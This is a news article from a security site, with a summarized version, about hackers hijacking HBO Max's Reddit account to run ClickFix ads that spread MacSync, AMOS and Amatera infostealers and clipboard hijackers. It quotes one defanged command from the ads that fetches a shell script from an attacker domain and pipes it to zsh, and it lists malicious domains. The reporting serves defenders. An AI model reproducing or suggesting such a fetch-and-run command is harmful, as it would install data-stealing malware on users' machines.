Hackers hijack HBO Max Reddit account to push malware in ClickFix ads
Recorded: Sept. 14, 2026, 7:08 p.m.
| Original | Summarized |
Hackers hijack HBO Max Reddit account to push malware in ClickFix ads News Featured Microsoft: September updates cause RDS failures on Windows Server Dutch NCSC: Critical Check Point VPN flaws exploitation is imminent New Android malware encrypts files, steals data, and harasses victims Florida confirms DMV database breached via stolen police account Hackers hijack HBO Max Reddit account to push malware in ClickFix ads Hackers target exposed Vite dev servers to steal AWS, Azure secrets Why Patch Automation Needs Brakes, Not Just an Accelerator Webinar: How malicious OAuth apps can lead to Google Workspace breaches Tutorials Latest How to access the Dark Web using the Tor Browser How to enable Kernel-mode Hardware-enforced Stack Protection in Windows 11 How to use the Windows Registry Editor How to backup and restore the Windows Registry How to start Windows in Safe Mode How to remove a Trojan, Virus, Worm, or other Malware How to show hidden files in Windows 7 How to see hidden files in Windows Webinars Latest Qualys BrowserCheck STOPDecrypter AuroraDecrypter FilesLockerDecrypter AdwCleaner ComboFix RKill Junkware Removal Tool Deals Categories eLearning IT Certification Courses Gear + Gadgets Security VPNs Popular Best VPNs How to change IP address Access the dark web safely Best VPN for YouTube Forums Virus Removal Guides HomeNewsSecurityHackers hijack HBO Max Reddit account to push malware in ClickFix ads Hackers hijack HBO Max Reddit account to push malware in ClickFix ads By Lawrence Abrams September 14, 2026 Hackers compromised HBO Max's official Reddit account and used it to push malicious ads that launched ClickFix attacks to infect Windows and macOS devices with information-stealing malware. Malicious HBO Max advertising on RedditSource: Adam Networks export _watch_v2=97d9d8dc;curl -sL "https://ember-bridge[.]com/curl/a44a37519au/setup.sh"| zsh Build your security blueprint for AI-powered attacks Join Mikko Hyppönen and security leaders from the NFL, CHANEL, and Atlassian for a two-hour digital summit on what AI-speed attacks change, what defenders should stop doing, and how to validate, decide, fix, and re-validate at machine speed. Related Articles: AMOS Lawrence Abrams Previous Article Post a Comment Community Rules You need to login in order to post a comment You may also like: Upcoming Webinar Popular Stories Passkey-themed phishing attacks lead to Microsoft 365 data theft Hackers abused Claude to extract secrets from 1.8M Android apps GitLab urges users to patch max severity path traversal flaw Sponsor Posts Stay one step ahead of new threats in the new year. Join Huntress for the monthly Tradecraft Tuesday. EtherHiding Malware on macOS: How Attackers Hide C2 on the Blockchain Find your gaps before an auditor does. Check your EU CRA readiness in 5 questions. Overdue a password health-check? Audit your Active Directory for free Patch automation needs more than speed. Action1 brings control into every stage of deployment. Upcoming Webinar Follow us: Main Sections News Community Forums Useful Resources Welcome Guide Company About BleepingComputer Terms of Use - Privacy Policy - Ethics Statement - Affiliate Disclosure Copyright @ 2003 - 2026 Bleeping Computer® LLC - All Rights Reserved Login Username Password Remember Me Sign in anonymously Sign in with Twitter Not a member yet? Register Now Help us understand the problem. What is going on with this comment? Spam Abusive or Harmful Inappropriate content Strong language Other Read our posting guidelinese to learn what content is prohibited. Submitting... |
Hackers exploited the official HBO Max Reddit account to distribute malware through malicious advertisements employing a social engineering technique known as ClickFix, resulting in infections across Windows and macOS systems. Security researchers from Hudson Rock and ADAMnetworks analyzed this campaign, which they termed PasteSwitch, revealing a broader operation designed to distribute various malicious payloads. The method relied on tricking victims into executing harmful commands by having them copy and paste them into legitimate system tools such as Windows Run, PowerShell, or macOS Terminal, under the pretense of fixing errors or installing legitimate software. This technique proved effective because victims executed the malicious commands themselves using built-in operating system utilities, which can potentially bypass certain browser and security software designed to detect malware downloads. The advertisements pushed by the compromised account were multifaceted; while some impersonated the streaming service, others promoted fake applications, AI tools, developer software, and macOS utilities, allowing the attackers to target a wider audience beyond HBO Max subscribers, including developers and users seeking specific software. The campaign systematically distributed information stealers, loaders, cryptocurrency clippers, and fake cryptocurrency wallet applications across targeted systems. The PasteSwitch operation involved attackers dynamically switching between different campaigns, platforms, payloads, and cryptocurrency theft methods based on the visitor's context, facilitated by attacker-supplied commands pasted by the victims. For macOS systems, one malware family observed in the attack was MacSync, which is capable of stealing sensitive data including browser credentials, Firefox profiles, Telegram data, Apple Notes, and macOS passwords. Persistence was established through the deployment of an AMOS helper, which utilized a directory named .com.apple.accountsd, enabling the malware to enroll infected systems with attacker-controlled servers to receive further instructions. On Windows systems, the attack chain utilized more complex methods to achieve execution and stealth. Researchers observed attacks using an MP3/HTA polyglot to create scheduled tasks, launch thirty-two bit PowerShell instances, disable the Microsoft Antimalware Scan Interface (AMSI), and generate victim-specific infrastructure based on the computer's name and username. Later stages leveraged obfuscated PowerShell and shellcode to load the Amatera Stealer directly into memory without saving the final payload to disk. Furthermore, the campaign included distribution of cryptocurrency clipboard hijacking malware, such as AnimateClipper and ZigClipper. The infrastructure for malware delivery, including commands used in the attack, utilized systems like ember-bridge.com. Although the attackers targeted HBO Max, the scope of the advertising included links pointing to domains associated with fake applications and guides, such as hbomaxx[.]app, codex-craft[.]com, and apple.clean-disk-guide[.]com, indicating an expanded reach into areas focused on AI and system utilities. The malicious advertisements were eventually paused by a Reddit administrator who reported them to Reddit’s security teams. |